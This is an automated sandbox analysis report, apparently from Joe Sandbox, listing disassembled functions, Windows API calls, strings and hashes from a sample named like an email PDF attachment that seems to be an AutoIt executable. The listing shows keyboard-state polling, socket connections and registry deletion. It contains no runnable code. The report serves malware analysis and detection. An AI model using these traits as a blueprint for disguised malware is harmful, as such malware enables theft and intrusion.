                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                                                                                                          • Instruction ID: 3f3378026f5778c995c86a6d37efb9eea1cbf45271afe4f027016aba6867a2c3
                                                                                                          • Opcode Fuzzy Hash: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                                                                                                          • Instruction Fuzzy Hash: 5251E4A0A447D57DFB3293748C55BFBBFA96B06300F088889F1D5468C2D399EC98D7A0
                                                                                                          Function 007B55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsncpy$LocalTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 2945705084-0
                                                                                                          • Opcode ID: 11f48fcb4073d499415622bcb711ba63da6c0449166f9dea4441cb537bb94cc2
                                                                                                          • Instruction ID: 3fb3b75e22224da857013a6c92a8c7111e860384df52398a39417f2054f85c06
                                                                                                          • Opcode Fuzzy Hash: 11f48fcb4073d499415622bcb711ba63da6c0449166f9dea4441cb537bb94cc2
                                                                                                          • Instruction Fuzzy Hash: 76418565C10614B6CF11EBB48C4ABCFB3B89F05350F50C966E51CE3222FB38A655C7AA
                                                                                                          Function 007AD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007AD5D4
                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007AD60A
                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007AD61B
                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007AD69D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                          • String ID: ,,~$DllGetClassObject
                                                                                                          • API String ID: 753597075-463960871
                                                                                                          • Opcode ID: befda2374fdea9f11846c6144bfbd127b519c92277448e8a633c320493a09c7f
                                                                                                          • Instruction ID: 469d6aad7b2eadaeb1ad7276fea36dc3344ac5331d677155f5776d029859ff4c
                                                                                                          • Opcode Fuzzy Hash: befda2374fdea9f11846c6144bfbd127b519c92277448e8a633c320493a09c7f
                                                                                                          • Instruction Fuzzy Hash: CE41C2B1601204EFDB24CF54C884A9A7BB9EF85350F1582A9FC0ADF205D7B9DD40CBA0
                                                                                                          Function 00752344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 00752357
                                                                                                          • ScreenToClient.USER32(008157B0,?), ref: 00752374
                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                          Strings
                                                                                                          • 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621, xrefs: 0078BFF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                          • String ID: 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621
                                                                                                          • API String ID: 4210589936-1561487433
                                                                                                          • Opcode ID: f3e0075bcb66267d61ae3df29163de12e915687e760a8668ba4b75b27bc6b43e
                                                                                                          • Instruction ID: 91ecf4e498bbec5a2725b1b409a002e07da1458fd43251b3364a8eb2ed0661cc
                                                                                                          • Opcode Fuzzy Hash: f3e0075bcb66267d61ae3df29163de12e915687e760a8668ba4b75b27bc6b43e
                                                                                                          • Instruction Fuzzy Hash: 3041A235604109FBDF259F68CC48AEDBB74FB06361F20435AF829922A1C7799D54DFA0
                                                                                                          Function 007B3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B3697,?), ref: 007B468B
                                                                                                            • Part of subcall function 007B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B3697,?), ref: 007B46A4
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 007B36B7
                                                                                                          • _wcscmp.LIBCMT ref: 007B36D3
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 007B36EB
                                                                                                          • _wcscat.LIBCMT ref: 007B3733
                                                                                                          • SHFileOperationW.SHELL32(?), ref: 007B379F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 1377345388-1173974218
                                                                                                          • Opcode ID: 358a3f435a38383f10cb70ce81e87dfa687ecba4f9d01b5f95f5da17705a64f1
                                                                                                          • Instruction ID: ab0c1b55d31053f62428ecf5ae0e8f860b7190910aa5734e506ef152b6efd50f
                                                                                                          • Opcode Fuzzy Hash: 358a3f435a38383f10cb70ce81e87dfa687ecba4f9d01b5f95f5da17705a64f1
                                                                                                          • Instruction Fuzzy Hash: 784180B1508344AEC751EF64C845ADFB7E8EF89384F10483EF49AC3251EA38D689C756
                                                                                                          Function 007D7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007D72AA
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D7351
                                                                                                          • IsMenu.USER32(?), ref: 007D7369
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D73B1
                                                                                                          • DrawMenuBar.USER32 ref: 007D73C4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3866635326-4108050209
                                                                                                          • Opcode ID: e136ab32dc37a4d94ad3c5f437ff4f1cace1c99e9dcb9816cef255e825e3f72e
                                                                                                          • Instruction ID: 64c64214ba8153fc2dd1b82cad66a0db3465e7e045da9291182705868993b5f4
                                                                                                          • Opcode Fuzzy Hash: e136ab32dc37a4d94ad3c5f437ff4f1cace1c99e9dcb9816cef255e825e3f72e
                                                                                                          • Instruction Fuzzy Hash: C3412575A04248EFDB24DF50D884AAABBB8FF08310F14852AFD15AB350E734AD50DB60
                                                                                                          Function 007D0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007D0FD4
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D0FFE
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 007D10B5
                                                                                                            • Part of subcall function 007D0FA5: RegCloseKey.ADVAPI32(?), ref: 007D101B
                                                                                                            • Part of subcall function 007D0FA5: FreeLibrary.KERNEL32(?), ref: 007D106D
                                                                                                            • Part of subcall function 007D0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007D1090
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 007D1058
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 395352322-0
                                                                                                          • Opcode ID: 21e187f5ac59f714bbe2177645dcbf1491b40c81d3d18c8f4cd0b8149b1f0ef1
                                                                                                          • Instruction ID: 6f0aaad1e970c78583e1120b4b51135610d60bc293b713d17624a1cda8e3af1d
                                                                                                          • Opcode Fuzzy Hash: 21e187f5ac59f714bbe2177645dcbf1491b40c81d3d18c8f4cd0b8149b1f0ef1
                                                                                                          • Instruction Fuzzy Hash: F7310D71901109FFDB15DF90DC89EFFB7BCEF08300F50416AE512E2251EA789E859AA4
                                                                                                          Function 007D62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007D62EC
                                                                                                          • GetWindowLongW.USER32(00E55C18,000000F0), ref: 007D631F
                                                                                                          • GetWindowLongW.USER32(00E55C18,000000F0), ref: 007D6354
                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007D6386
                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007D63B0
                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 007D63C1
                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007D63DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 2178440468-0
                                                                                                          • Opcode ID: f3088ec56619f1d6c14313744d7ca72ca224185d32ada863cb9c5b4fd68a5aa4
                                                                                                          • Instruction ID: 1274116ff664bbdee4acfe0af3309ac685874a0e46e270cad0582545b3d8f185
                                                                                                          • Opcode Fuzzy Hash: f3088ec56619f1d6c14313744d7ca72ca224185d32ada863cb9c5b4fd68a5aa4
                                                                                                          • Instruction Fuzzy Hash: F931FE34640250EFDB20CF58DC84F993BF5BB4A714F1981AAF5059B2B2CB79A840DB50
                                                                                                          Function 007ADAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007ADB2E
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007ADB54
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 007ADB57
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 007ADB75
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 007ADB7E
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 007ADBA3
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 007ADBB1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761583154-0
                                                                                                          • Opcode ID: 75151dab9c9866eea750eabde1991e58e17fcd4a0c78fd7e4162e56e51b32ac5
                                                                                                          • Instruction ID: f4bfa6ab4bf47b2d09ff29454df8a4383c2bda1286bb3759d3557ebbbddde006
                                                                                                          • Opcode Fuzzy Hash: 75151dab9c9866eea750eabde1991e58e17fcd4a0c78fd7e4162e56e51b32ac5
                                                                                                          • Instruction Fuzzy Hash: 16219576601219AFDF20DFA8DC88CBB73BCEB49360B05C626F956DB250D6789C4187B4
                                                                                                          Function 007C6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C7DB6
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007C61C6
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C61D5
                                                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C620E
                                                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 007C6217
                                                                                                          • WSAGetLastError.WSOCK32 ref: 007C6221
                                                                                                          • closesocket.WSOCK32(00000000), ref: 007C624A
                                                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6263
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 910771015-0
                                                                                                          • Opcode ID: 9c3259472ba1fe25fc60d25c055184f1e2bf02cc790a6fb07b4404f908ef65e5
                                                                                                          • Instruction ID: a96611224f6834d97880fc110eb5c9173d9c23d7895ce1e4c15a4351fb251f95
                                                                                                          • Opcode Fuzzy Hash: 9c3259472ba1fe25fc60d25c055184f1e2bf02cc790a6fb07b4404f908ef65e5
                                                                                                          • Instruction Fuzzy Hash: 92317271600218ABDF10AF64CC89FB977B9EB45761F04806DFD06A7291DB78AD049BA1
                                                                                                          Function 007AF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                          • Opcode ID: ca778b200f1a762d5f6dcb35cc2dfa25c53a5d2a333032ad2364f14ef9e98e56
                                                                                                          • Instruction ID: 865877d11f47540d831410ea175c12c6ff55a26042a24582d538cf9600ee91fd
                                                                                                          • Opcode Fuzzy Hash: ca778b200f1a762d5f6dcb35cc2dfa25c53a5d2a333032ad2364f14ef9e98e56
                                                                                                          • Instruction Fuzzy Hash: DF2149B2204611E6D630B774AC06EB7739CEF9A350F508639F84A87091EB9C9D42D3D5
                                                                                                          Function 007ADBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007ADC09
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007ADC2F
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 007ADC32
                                                                                                          • SysAllocString.OLEAUT32 ref: 007ADC53
                                                                                                          • SysFreeString.OLEAUT32 ref: 007ADC5C
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 007ADC76
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 007ADC84
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761583154-0
                                                                                                          • Opcode ID: 5c2df0fd1407746ad788ff265da8dc8a72d317927605c3bf292e698b8a28081d
                                                                                                          • Instruction ID: dba0a3c84ffd0e07ebdd1658d84bb8d8f297fe2c713db1caf2f67ef510c12c73
                                                                                                          • Opcode Fuzzy Hash: 5c2df0fd1407746ad788ff265da8dc8a72d317927605c3bf292e698b8a28081d
                                                                                                          • Instruction Fuzzy Hash: 84218876605204AF9B20DFB8DC88DAB77ECEB49360B50C226F956CB660DA78DC41C774
                                                                                                          Function 007D75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                            • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                            • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007D7632
                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007D763F
                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007D764A
                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007D7659
                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007D7665
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                          • String ID: Msctls_Progress32
                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                          • Opcode ID: 52f6aa4610c1b74b2fdd3cd1e853b4f390ac5f530fc0e3f02651cf33a3e3e7f7
                                                                                                          • Instruction ID: ba2b2e782e139723309e08190ae99a2e5388874f4e104ac54279d017a5e9ad68
                                                                                                          • Opcode Fuzzy Hash: 52f6aa4610c1b74b2fdd3cd1e853b4f390ac5f530fc0e3f02651cf33a3e3e7f7
                                                                                                          • Instruction Fuzzy Hash: EE1190B2110219BFEF158F64CC85EE77F6DEF087A8F014115FA44A61A0DA76EC21DBA4
                                                                                                          Function 00779AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __init_pointers.LIBCMT ref: 00779AE6
                                                                                                            • Part of subcall function 00773187: EncodePointer.KERNEL32(00000000), ref: 0077318A
                                                                                                            • Part of subcall function 00773187: __initp_misc_winsig.LIBCMT ref: 007731A5
                                                                                                            • Part of subcall function 00773187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00779EA0
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00779EB4
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00779EC7
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00779EDA
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00779EED
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00779F00
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00779F13
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00779F26
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00779F39
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00779F4C
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00779F5F
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00779F72
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00779F85
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00779F98
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00779FAB
                                                                                                            • Part of subcall function 00773187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00779FBE
                                                                                                          • __mtinitlocks.LIBCMT ref: 00779AEB
